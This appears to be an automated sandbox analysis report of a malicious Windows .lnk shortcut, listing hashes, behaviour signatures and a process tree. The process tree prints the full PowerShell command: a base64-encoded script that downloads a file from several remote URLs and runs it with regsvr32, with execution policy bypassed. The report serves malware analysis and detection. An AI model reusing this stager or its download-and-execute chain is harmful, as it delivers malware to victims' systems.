Analysis
-
max time kernel
121s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
13-11-2024 09:24
Static task
static1
Behavioral task
behavioral1
Sample
c67871e6e9d3247002b6b15e1f4b1d3b99658f74636e53a8ce205030506ad463.lnk
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
c67871e6e9d3247002b6b15e1f4b1d3b99658f74636e53a8ce205030506ad463.lnk
Resource
win10v2004-20241007-en
General
-
Target
c67871e6e9d3247002b6b15e1f4b1d3b99658f74636e53a8ce205030506ad463.lnk
-
Size
2KB
-
MD5
62a2b911a0cbbbf5d5f5b3219e5104e4
-
SHA1
26eafa71722e807e1e13844456f201d12a75bd72
-
SHA256
c67871e6e9d3247002b6b15e1f4b1d3b99658f74636e53a8ce205030506ad463
-
SHA512
060027a0f5a0ea24c1cc88dafad85dc2ab6f19fdc76a47f3cf168c4085c39538f1dde60049df00d23454f69a90b8ce07ccb0fbca599e793c901046f75f8da543
Malware Config
Signatures
-
Processes:
powershell.exepowershell.exepid Process 2820 powershell.exe 2736 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid Process 2736 powershell.exe 2820 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 2736 powershell.exe Token: SeDebugPrivilege 2820 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exepowershell.exedescription pid Process procid_target PID 3040 wrote to memory of 2736 3040 cmd.exe 31 PID 3040 wrote to memory of 2736 3040 cmd.exe 31 PID 3040 wrote to memory of 2736 3040 cmd.exe 31 PID 2736 wrote to memory of 2820 2736 powershell.exe 32 PID 2736 wrote to memory of 2820 2736 powershell.exe 32 PID 2736 wrote to memory of 2820 2736 powershell.exe 32
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\c67871e6e9d3247002b6b15e1f4b1d3b99658f74636e53a8ce205030506ad463.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:3040 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "ARCHIVO 1512.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovLzUxLjIyMi43Mi4yMzcvd3AtaW5jbHVkZXMvMmw5Mlh1bG5DNmFaenYwak5HTi8iLCJodHRwOi8vdnJzdGFyLXBhcmsuY29tL3dwLWluY2x1ZGVzLzJVWWhOZ0lhTmVJQk0vIiwiaHR0cDovL2RuMDAwODkzLmZlcm96by5jb20vYWdlbmRhL2NrVTRvck9uNC8iLCJodHRwOi8vZGxxc2NsdWIuY29tL3dwLWNvbnRlbnQvdXBsb2Fkcy80SW1NWWtnSTQ0cHN3ZWFLSS8iLCJodHRwOi8vdG93YXJkc3VuLm5ldC9hZG1pbi9uNTZ3ZzliU1pQRi8iLCJodHRwOi8vY3JlY2VyY3JlYW5kby5jb20vdGFwYXMyL0FXbG8vIik7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGVudjpURU1QL21TUm9DeFBJWW4uaGVEO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvbVNSb0N4UElZbi5oZUQ7YnJlYWt9IGNhdGNoIHsgfX0=')) > "C:\Users\Admin\AppData\Local\Temp\vyrEzcdcTl.ps1"; powershell -executionpolicy bypass -file "$env:TEMP/\vyrEzcdcTl.ps1"; Remove-Item "$env:TEMP/\vyrEzcdcTl.2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\Admin\AppData\Local\Temp/\vyrEzcdcTl.ps13⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2820
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
946B
MD5b6c0d424fc2e8f0305869f276f3ab851
SHA1cc330652aade5fa66cf581884b1a347673206cd0
SHA25670280b341855deaa98065c4548ba8cbbf318a99b288bafa4217c6b205519776c
SHA51221a656692df485e9c678617c6c77c8ea9ab4cef4a214d56f7ff7c5df7b0c484eb4494fb60552746c178875e3ddc66547f2e2eb31d67be8c3745de862bbea4e8e